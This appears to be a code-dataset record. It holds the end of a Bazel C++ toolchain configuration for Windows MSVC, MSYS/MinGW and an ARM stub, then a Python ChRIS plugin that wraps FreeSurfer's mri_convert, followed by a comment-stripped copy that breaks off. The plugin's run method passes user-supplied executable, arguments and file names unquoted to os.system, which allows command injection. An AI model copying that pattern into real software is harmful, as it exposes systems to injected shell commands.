expand_if_not_available = "output_assembly_file",
),
flag_group(
flag_groups = [
flag_group(
flags = ["/Fa%{output_file}"],
expand_if_available = "output_assembly_file",
),
],
expand_if_available = "output_file",
),
flag_group(
flag_groups = [
flag_group(
flags = ["/P", "/Fi%{output_file}"],
expand_if_available = "output_preprocess_file",
),
],
expand_if_available = "output_file",
),
],
),
],
)
nologo_feature = feature(
name = "nologo",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
flag_groups = [flag_group(flags = ["/nologo"])],
),
],
)
smaller_binary_feature = feature(
name = "smaller_binary",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Gy", "/Gw"])],
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/OPT:ICF", "/OPT:REF"])],
with_features = [with_feature_set(features = ["opt"])],
),
],
)
compiler_input_flags_feature = feature(
name = "compiler_input_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["/c", "%{source_file}"],
expand_if_available = "source_file",
),
],
),
],
)
def_file_feature = feature(
name = "def_file",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEF:%{def_file_path}", "/ignore:4070"],
expand_if_available = "def_file_path",
),
],
),
],
)
msvc_env_feature = feature(
name = "msvc_env",
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\BIN\\amd64;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319;C:\\Windows\\Microsoft.NET\\Framework64\\;C:\\Program Files (x86)\\Windows Kits\\8.1\\bin\\x64;C:\\Program Files (x86)\\Windows Kits\\8.1\\bin\\x86;;C:\\Windows\\system32"),
env_entry(key = "TMP", value = "C:\\Users\\ContainerAdministrator\\AppData\\Local\\Temp"),
env_entry(key = "TEMP", value = "C:\\Users\\ContainerAdministrator\\AppData\\Local\\Temp"),
],
),
],
implies = ["msvc_compile_env", "msvc_link_env"],
)
features = [
no_legacy_features_feature,
nologo_feature,
has_configured_linker_path_feature,
no_stripping_feature,
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
default_compile_flags_feature,
msvc_env_feature,
msvc_compile_env_feature,
msvc_link_env_feature,
include_paths_feature,
preprocessor_defines_feature,
parse_showincludes_feature,
generate_pdb_file_feature,
shared_flag_feature,
linkstamps_feature,
output_execpath_flags_feature,
archiver_flags_feature,
input_param_flags_feature,
linker_subsystem_flag_feature,
user_link_flags_feature,
default_link_flags_feature,
linker_param_file_feature,
static_link_msvcrt_feature,
static_link_msvcrt_no_debug_feature,
dynamic_link_msvcrt_no_debug_feature,
static_link_msvcrt_debug_feature,
dynamic_link_msvcrt_debug_feature,
dbg_feature,
fastbuild_feature,
opt_feature,
frame_pointer_feature,
disable_assertions_feature,
determinism_feature,
treat_warnings_as_errors_feature,
smaller_binary_feature,
ignore_noisy_warnings_feature,
user_compile_flags_feature,
sysroot_feature,
unfiltered_compile_flags_feature,
compiler_output_flags_feature,
compiler_input_flags_feature,
def_file_feature,
windows_export_all_symbols_feature,
no_windows_export_all_symbols_feature,
supports_dynamic_linker_feature,
supports_interface_shared_libraries_feature,
]
artifact_name_patterns = [
artifact_name_pattern(
category_name = "object_file",
prefix = "",
extension = ".obj",
),
artifact_name_pattern(
category_name = "static_library",
prefix = "",
extension = ".lib",
),
artifact_name_pattern(
category_name = "alwayslink_static_library",
prefix = "",
extension = ".lo.lib",
),
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
artifact_name_pattern(
category_name = "dynamic_library",
prefix = "",
extension = ".dll",
),
artifact_name_pattern(
category_name = "interface_library",
prefix = "",
extension = ".if.lib",
),
]
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/lib.exe"),
tool_path(name = "ml", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe"),
tool_path(name = "cpp", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe"),
tool_path(name = "gcc", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe"),
tool_path(name = "gcov", path = "wrapper/bin/msvc_nop.bat"),
tool_path(name = "ld", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe"),
tool_path(name = "nm", path = "wrapper/bin/msvc_nop.bat"),
tool_path(
name = "objcopy",
path = "wrapper/bin/msvc_nop.bat",
),
tool_path(
name = "objdump",
path = "wrapper/bin/msvc_nop.bat",
),
tool_path(
name = "strip",
path = "wrapper/bin/msvc_nop.bat",
),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = None,
)
def _windows_msys_mingw_impl(ctx):
toolchain_identifier = "msys_x64_mingw"
host_system_name = "local"
target_system_name = "local"
target_cpu = "x64_windows"
target_libc = "mingw"
compiler = "mingw-gcc"
abi_version = "local"
abi_libc_version = "local"
cc_target_os = None
builtin_sysroot = None
action_configs = []
targets_windows_feature = feature(
name = "targets_windows",
implies = ["copy_dynamic_libraries_to_binary"],
enabled = True,
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
gcc_env_feature = feature(
name = "gcc_env",
enabled = True,
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "c:/tools/msys64/mingw64/bin"),
],
),
],
)
msys_mingw_flags = [
"-std=gnu++0x",
]
msys_mingw_link_flags = [
"-lstdc++",
]
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = msys_mingw_flags)] if msys_mingw_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = msys_mingw_link_flags)] if msys_mingw_link_flags else []),
),
],
)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
features = [
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
gcc_env_feature,
default_compile_flags_feature,
default_link_flags_feature,
supports_dynamic_linker_feature,
]
cxx_builtin_include_directories = [
"C:\\botcode\\w",
"c:/tools/msys64/mingw64/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
artifact_name_patterns = [
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
]
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "c:/tools/msys64/mingw64/bin/ar"),
tool_path(name = "compat-ld", path = "c:/tools/msys64/mingw64/bin/ld"),
tool_path(name = "cpp", path = "c:/tools/msys64/mingw64/bin/cpp"),
tool_path(name = "dwp", path = "c:/tools/msys64/mingw64/bin/dwp"),
tool_path(name = "gcc", path = "c:/tools/msys64/mingw64/bin/gcc"),
tool_path(name = "gcov", path = "c:/tools/msys64/mingw64/bin/gcov"),
tool_path(name = "ld", path = "c:/tools/msys64/mingw64/bin/ld"),
tool_path(name = "nm", path = "c:/tools/msys64/mingw64/bin/nm"),
tool_path(name = "objcopy", path = "c:/tools/msys64/mingw64/bin/objcopy"),
tool_path(name = "objdump", path = "c:/tools/msys64/mingw64/bin/objdump"),
tool_path(name = "strip", path = "c:/tools/msys64/mingw64/bin/strip"),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = cc_target_os,
)
def _armeabi_impl(ctx):
toolchain_identifier = "stub_armeabi-v7a"
host_system_name = "armeabi-v7a"
target_system_name = "armeabi-v7a"
target_cpu = "armeabi-v7a"
target_libc = "armeabi-v7a"
compiler = "compiler"
abi_version = "armeabi-v7a"
abi_libc_version = "armeabi-v7a"
cc_target_os = None
builtin_sysroot = None
action_configs = []
supports_pic_feature = feature(name = "supports_pic", enabled = True)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
features = [supports_dynamic_linker_feature, supports_pic_feature]
cxx_builtin_include_directories = [
"C:\\botcode\\w",
]
artifact_name_patterns = []
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "/bin/false"),
tool_path(name = "compat-ld", path = "/bin/false"),
tool_path(name = "cpp", path = "/bin/false"),
tool_path(name = "dwp", path = "/bin/false"),
tool_path(name = "gcc", path = "/bin/false"),
tool_path(name = "gcov", path = "/bin/false"),
tool_path(name = "ld", path = "/bin/false"),
tool_path(name = "nm", path = "/bin/false"),
tool_path(name = "objcopy", path = "/bin/false"),
tool_path(name = "objdump", path = "/bin/false"),
tool_path(name = "strip", path = "/bin/false"),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = cc_target_os,
)
def _impl(ctx):
if ctx.attr.cpu == "armeabi-v7a":
return _armeabi_impl(ctx)
elif ctx.attr.cpu == "x64_windows" and ctx.attr.compiler == "msvc-cl":
return _windows_msvc_impl(ctx)
elif ctx.attr.cpu == "x64_windows" and ctx.attr.compiler == "mingw-gcc":
return _windows_msys_mingw_impl(ctx)
tool_paths = [
tool_path(name = "ar", path = "c:/tools/msys64/usr/bin/ar"),
tool_path(name = "compat-ld", path = "c:/tools/msys64/usr/bin/ld"),
tool_path(name = "cpp", path = "c:/tools/msys64/usr/bin/cpp"),
tool_path(name = "dwp", path = "c:/tools/msys64/usr/bin/dwp"),
tool_path(name = "gcc", path = "c:/tools/msys64/usr/bin/gcc"),
tool_path(name = "gcov", path = "c:/tools/msys64/usr/bin/gcov"),
tool_path(name = "ld", path = "c:/tools/msys64/usr/bin/ld"),
tool_path(name = "nm", path = "c:/tools/msys64/usr/bin/nm"),
tool_path(name = "objcopy", path = "c:/tools/msys64/usr/bin/objcopy"),
tool_path(name = "objdump", path = "c:/tools/msys64/usr/bin/objdump"),
tool_path(name = "strip", path = "c:/tools/msys64/usr/bin/strip"),
]
cxx_builtin_include_directories = [
"C:\\botcode\\w",
"c:/tools/msys64/usr/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
action_configs = []
compile_flags = [
]
dbg_compile_flags = [
]
opt_compile_flags = [
]
cxx_flags = [
"-std=gnu++0x",
]
link_flags = [
"-lstdc++",
]
opt_link_flags = [
]
unfiltered_compile_flags = [
]
targets_windows_feature = feature(
name = "targets_windows",
implies = ["copy_dynamic_libraries_to_binary"],
enabled = True,
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
gcc_env_feature = feature(
name = "gcc_env",
enabled = True,
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "c:/tools/msys64/usr/bin"),
],
),
],
)
windows_features = [
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
gcc_env_feature,
]
supports_pic_feature = feature(
name = "supports_pic",
enabled = True,
)
supports_start_end_lib_feature = feature(
name = "supports_start_end_lib",
enabled = True,
)
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = compile_flags)] if compile_flags else []),
),
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = dbg_compile_flags)] if dbg_compile_flags else []),
with_features = [with_feature_set(features = ["dbg"])],
),
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = opt_compile_flags)] if opt_compile_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = cxx_flags)] if cxx_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = link_flags)] if link_flags else []),
),
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = opt_link_flags)] if opt_link_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
],
)
dbg_feature = feature(name = "dbg")
opt_feature = feature(name = "opt")
sysroot_feature = feature(
name = "sysroot",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["--sysroot=%{sysroot}"],
expand_if_available = "sysroot",
),
],
),
],
)
fdo_optimize_feature = feature(
name = "fdo_optimize",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [
flag_group(
flags = [
"-fprofile-use=%{fdo_profile_path}",
"-fprofile-correction",
],
expand_if_available = "fdo_profile_path",
),
],
),
],
provides = ["profile"],
)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
user_compile_flags_feature = feature(
name = "user_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [
flag_group(
flags = ["%{user_compile_flags}"],
iterate_over = "user_compile_flags",
expand_if_available = "user_compile_flags",
),
],
),
],
)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = unfiltered_compile_flags)] if unfiltered_compile_flags else []),
),
],
)
features = windows_features + [
supports_pic_feature,
default_compile_flags_feature,
default_link_flags_feature,
fdo_optimize_feature,
supports_dynamic_linker_feature,
dbg_feature,
opt_feature,
user_compile_flags_feature,
sysroot_feature,
unfiltered_compile_flags_feature,
]
artifact_name_patterns = [
artifact_name_pattern(category_name = "executable", prefix = "", extension = ".exe"),
]
make_variables = []
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = "msys_x64",
host_system_name = "local",
target_system_name = "local",
target_cpu = "x64_windows",
target_libc = "msys",
compiler = "msys-gcc",
abi_version = "local",
abi_libc_version = "local",
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = "",
cc_target_os = None,
)
cc_toolchain_config = rule(
implementation = _impl,
attrs = {
"cpu": attr.string(mandatory = True),
"compiler": attr.string(),
},
provides = [CcToolchainConfigInfo],
)
| true
| true
|
790ddea0a7befd113cbee96ab0c5dd2da399d1ad
| 8,729
|
py
|
Python
|
mri_convert_ppc64/mri_convert_ppc64.py
|
quinnyyy/pl-mri_convert_ppc64
|
8a3e1bd5778c350432467ad19f2262809ee2833c
|
[
"MIT"
] | 1
|
2021-04-22T10:48:36.000Z
|
2021-04-22T10:48:36.000Z
|
mri_convert_ppc64/mri_convert_ppc64.py
|
quinnyyy/pl-mri_convert_ppc64
|
8a3e1bd5778c350432467ad19f2262809ee2833c
|
[
"MIT"
] | null | null | null |
mri_convert_ppc64/mri_convert_ppc64.py
|
quinnyyy/pl-mri_convert_ppc64
|
8a3e1bd5778c350432467ad19f2262809ee2833c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# mri_convert_ppc64 ds ChRIS plugin app
#
# (c) 2016-2019 Fetal-Neonatal Neuroimaging & Developmental Science Center
# Boston Children's Hospital
#
# http://childrenshospital.org/FNNDSC/
# dev@babyMRI.org
#
import os
import sys
sys.path.append(os.path.dirname(__file__))
# import the Chris app superclass
from chrisapp.base import ChrisApp
Gstr_title = """
_ _ ____ ___
(_) | | / ___| / |
_ __ ___ _ __ _ ___ ___ _ ____ _____ _ __| |_ _ __ _ __ ___/ /___ / /| |
| '_ ` _ \| '__| | / __/ _ \| '_ \ \ / / _ \ '__| __| | '_ \| '_ \ / __| ___ \/ /_| |
| | | | | | | | || (_| (_) | | | \ V / __/ | | |_ | |_) | |_) | (__| \_/ |\___ |
|_| |_| |_|_| |_| \___\___/|_| |_|\_/ \___|_| \__| | .__/| .__/ \___\_____/ |_/
______ ______| | | |
|______| |______|_| |_|
"""
Gstr_synopsis = """
NAME
mri_convert_ppc64.py
SYNOPSIS
python mri_convert_ppc64.py \\
[-h] [--help] \\
[--json] \\
[--man] \\
[--meta] \\
[--savejson <DIR>] \\
[-v <level>] [--verbosity <level>] \\
[--version] \\
[--inputFile <inputFile>] \\
[--outputFile <outputFile>] \\
[--executable <executable>] \\
[--execArgs <execArgs>] \\
<inputDir> \\
<outputDir>
BRIEF EXAMPLE
* Bare bones execution
mkdir in out && chmod 777 out
python mri_convert_ppc64.py \\
in out
DESCRIPTION
`mri_convert_ppc64.py` calls an underlying executable
(typically 'mri_convert') and passes it an input and output spec.
ARGS
[--inputFile <inputFile>]
The input file, relative to <inputDir>.
[--outputFile <outputFile>]
The output file, relative to <outpufDir>.
[--executable <executable>]
The actual executable to run.
[--execArgs <execArgs>]
Additional executable-specific command line args.
[-h] [--help]
If specified, show help message and exit.
[--json]
If specified, show json representation of app and exit.
[--man]
If specified, print (this) man page and exit.
[--meta]
If specified, print plugin meta data and exit.
[--savejson <DIR>]
If specified, save json representation file to DIR and exit.
[-v <level>] [--verbosity <level>]
Verbosity level for app. Not used currently.
[--version]
If specified, print version number and exit.
"""
class Mri_convert_ppc64(ChrisApp):
"""
This calls a pre-built PPC64 'mri_convert' that is housed in a base container..
"""
AUTHORS = 'BU-2019-Power9 (dev@babyMRI.org)'
SELFPATH = os.path.dirname(os.path.abspath(__file__))
SELFEXEC = os.path.basename(__file__)
EXECSHELL = 'python3'
TITLE = 'A PowerPPC plugin to run the FreeSurfer mri_convert'
CATEGORY = ''
TYPE = 'ds'
DESCRIPTION = 'This calls a pre-built PPC64 mri_convert that is housed in a base container.'
DOCUMENTATION = 'http://wiki'
VERSION = '0.1'
ICON = '' # url of an icon image
LICENSE = 'Opensource (MIT)'
MAX_NUMBER_OF_WORKERS = 1 # Override with integer value
MIN_NUMBER_OF_WORKERS = 1 # Override with integer value
MAX_CPU_LIMIT = '' # Override with millicore value as string, e.g. '2000m'
MIN_CPU_LIMIT = '' # Override with millicore value as string, e.g. '2000m'
MAX_MEMORY_LIMIT = '' # Override with string, e.g. '1Gi', '2000Mi'
MIN_MEMORY_LIMIT = '' # Override with string, e.g. '1Gi', '2000Mi'
MIN_GPU_LIMIT = 0 # Override with the minimum number of GPUs, as an integer, for your plugin
MAX_GPU_LIMIT = 0 # Override with the maximum number of GPUs, as an integer, for your plugin
# Use this dictionary structure to provide key-value output descriptive information
# that may be useful for the next downstream plugin. For example:
#
# {
# "finalOutputFile": "final/file.out",
# "viewer": "genericTextViewer",
# }
#
# The above dictionary is saved when plugin is called with a ``--saveoutputmeta``
# flag. Note also that all file paths are relative to the system specified
# output directory.
OUTPUT_META_DICT = {}
def define_parameters(self):
"""
Define the CLI arguments accepted by this plugin app.
Use self.add_argument to specify a new app argument.
"""
self.add_argument('--executable',
dest = 'executable',
type = str,
optional = True,
help = 'the conversion program to use',
default = '/usr/bin/mri_convert')
self.add_argument('--inputFile',
dest = 'inputFile',
type = str,
optional = True,
help = 'the input file',
default = '')
self.add_argument('--outputFile',
dest = 'outputFile',
type = str,
optional = True,
help = 'the output file',
default = '')
self.add_argument('--execArgs',
dest = 'execArgs',
type = str,
optional = True,
help = 'additonal arguments for the chosen executable',
default = '')
def run(self, options):
"""
Define the code to be run by this plugin app.
"""
if not len(options.inputFile):
print("ERROR: No input file has been specified!")
print("You must specify an input file relative to the input directory.")
sys.exit(1)
if not len(options.outputFile):
print("ERROR: No output file has been specified!")
print("You must specicy an output file relative to the output directory.")
sys.exit(1)
str_cmd = '%s %s %s/%s %s/%s' % ( options.executable,
options.execArgs,
options.inputdir,
options.inputFile,
options.outputdir,
options.outputFile)
os.system(str_cmd)
def show_man_page(self):
"""
Print the app's man page.
"""
print(Gstr_title)
print(Gstr_synopsis)
# ENTRYPOINT
if __name__ == "__main__":
chris_app = Mri_convert_ppc64()
chris_app.launch()
| 39.677273
| 108
| 0.414251
|
#
# http://childrenshospital.org/FNNDSC/
# dev@babyMRI.org
#
import os
import sys
sys.path.append(os.path.dirname(__file__))
# import the Chris app superclass
from chrisapp.base import ChrisApp
Gstr_title = """
_ _ ____ ___
(_) | | / ___| / |
_ __ ___ _ __ _ ___ ___ _ ____ _____ _ __| |_ _ __ _ __ ___/ /___ / /| |
| '_ ` _ \| '__| | / __/ _ \| '_ \ \ / / _ \ '__| __| | '_ \| '_ \ / __| ___ \/ /_| |
| | | | | | | | || (_| (_) | | | \ V / __/ | | |_ | |_) | |_) | (__| \_/ |\___ |
|_| |_| |_|_| |_| \___\___/|_| |_|\_/ \___|_| \__| | .__/| .__/ \___\_____/ |_/
______ ______| | | |
|______| |______|_| |_|
"""
Gstr_synopsis = """
NAME
mri_convert_ppc64.py
SYNOPSIS
python mri_convert_ppc64.py \\
[-h] [--help] \\
[--json] \\
[--man] \\
[--meta] \\
[--savejson <DIR>] \\
[-v <level>] [--verbosity <level>] \\
[--version] \\
[--inputFile <inputFile>] \\
[--outputFile <outputFile>] \\
[--executable <executable>] \\
[--execArgs <execArgs>] \\
<inputDir> \\
<outputDir>
BRIEF EXAMPLE
* Bare bones execution
mkdir in out && chmod 777 out
python mri_convert_ppc64.py \\
in out
DESCRIPTION
`mri_convert_ppc64.py` calls an underlying executable
(typically 'mri_convert') and passes it an input and output spec.
ARGS
[--inputFile <inputFile>]
The input file, relative to <inputDir>.
[--outputFile <outputFile>]
The output file, relative to <outpufDir>.
[--executable <executable>]
The actual executable to run.
[--execArgs <execArgs>]
Additional executable-specific command line args.
[-h] [--help]
If specified, show help message and exit.
[--json]
If specified, show json representation of app and exit.
[--man]
If specified, print (this) man page and exit.
[--meta]
If specified, print plugin meta data and exit.
[--savejson <DIR>]
If specified, save json representation file to DIR and exit.
[-v <level>] [--verbosity <level>]
Verbosity level for app. Not used currently.
[--version]
If specified, print version number and exit.
"""
class Mri_convert_ppc64(ChrisApp):
AUTHORS = 'BU-2019-Power9 (dev@babyMRI.org)'
SELFPATH = os.path.dirname(os.path.abspath(__file__))
SELFEXEC = os.path.basename(__file__)
EXECSHELL = 'python3'
TITLE = 'A PowerPPC plugin to run the FreeSurfer mri_convert'
CATEGORY = ''
TYPE = 'ds'
DESCRIPTION = 'This calls a pre-built PPC64 mri_convert that is housed in a base container.'
DOCUMENTATION = 'http://wiki'
VERSION = '0.1'
ICON = '' # url of an icon image
LICENSE = 'Opensource (MIT)'
MAX_NUMBER_OF_WORKERS = 1 # Override with integer value
MIN_NUMBER_OF_WORKERS = 1 # Override with integer value
MAX_CPU_LIMIT = '' # Override with millicore value as string, e.g. '2000m'
MIN_CPU_LIMIT = '' # Override with millicore value as string, e.g. '2000m'
MAX_MEMORY_LIMIT = '' # Override with string, e.g. '1Gi', '2000Mi'
